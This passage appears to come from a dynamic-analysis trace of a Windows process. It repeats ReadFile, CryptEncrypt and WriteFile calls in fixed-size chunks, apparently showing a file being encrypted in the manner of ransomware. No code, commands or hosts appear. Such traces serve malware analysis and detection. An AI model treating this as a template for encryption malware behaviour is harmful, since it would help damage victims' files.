lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.544] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.544] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.544] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.544] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.544] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.544] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.544] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.544] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.544] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.545] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.545] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.545] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.545] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.545] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.545] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.545] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.545] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.545] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.545] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.545] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.545] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.545] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.545] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.545] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.545] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.545] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.545] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.546] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.546] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.546] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.546] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.546] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.546] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.546] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.546] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.546] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.547] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.547] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.547] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.547] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.547] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.547] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.547] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.547] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.547] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.547] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.547] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.547] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.548] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.548] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.548] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.548] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.548] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.548] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.548] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.548] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.548] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.548] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.548] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.548] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.549] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.549] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.549] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.549] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.549] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.549] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.549] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.550] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.550] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.550] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.550] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.550] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.550] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.550] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.550] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.550] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.550] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.550] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.551] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.551] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.551] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.551] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.551] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.551] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.551] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.551] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.551] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.551] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.551] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.551] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.551] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.552] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.552] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.552] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.552] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.552] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.552] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.552] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.552] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.552] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.552] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.552] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.552] ReadFile (in: hFile=0x5d4c, 